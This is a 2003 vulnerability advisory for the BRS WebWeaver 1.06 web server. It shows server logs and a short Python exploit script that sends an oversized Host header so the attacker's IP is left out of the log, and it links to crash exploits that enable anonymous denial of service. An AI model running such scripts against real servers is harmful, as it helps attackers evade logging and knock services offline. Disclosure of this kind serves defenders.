|
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: BRS WebWeaver: Anonymous Surfing product: BRS WebWeaver 1.06 vendor: http://www.brswebweaver.com risk: high date: 09/24/2k3 discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/027_en http://f0kp.iplus.ru/bz/027_ru contact email: euronymous at iplus dot ru =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= 0x01. Anonymous surfing ======================= WebWeaver 1.06 and probably prior versions will allow `anonymous surfing' with some trick. If you request the http server with long `Host' field of HTTP packet, then Webweaver dont logs your IP adrress in server log: HTTP Server Started - 24/Sep/2003:18:13:39 10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-" 10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-" - - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-" - - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-" - - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-" HTTP server response: --------------------- HTTP/1.0 414 Request-URI Too Large Sever: BRS WebWeaver/1.06 Date: Wed, 24 Sep 2003 14:16:11 GMT Content-Type: text/html <HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request -URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi s server.</BODY></HTML> Exploit code: ------------- #! /usr/bin/env python ## # by euronymous [ http://f0kp.iplus.ru ] # # Usage: ./WWanon.py <target_host> ## import sys, socket H0ST = sys.argv[1] BUF = 'fp' * 0x815F f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) f.connect((H0ST,80)) f.send('GET / HTTP/1.1\r\n') f.send('Host: '+BUF+'\n\n') WWout = f.recv(1024) f.close print WWout 0x02. Remote crashes again ========================== WW author was unable to fix early overflow conditions in his crappy proggie, he is just increases the vulnerable buffer size. Therefore, you still can to crash any WW instances with exploits, released earlier, but you have to change size of request in exploit code. Using technik, that mentioned above, you can DoS anonymously. Exploit urls: [1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request. [2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST 0x03. Greetings =============== Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..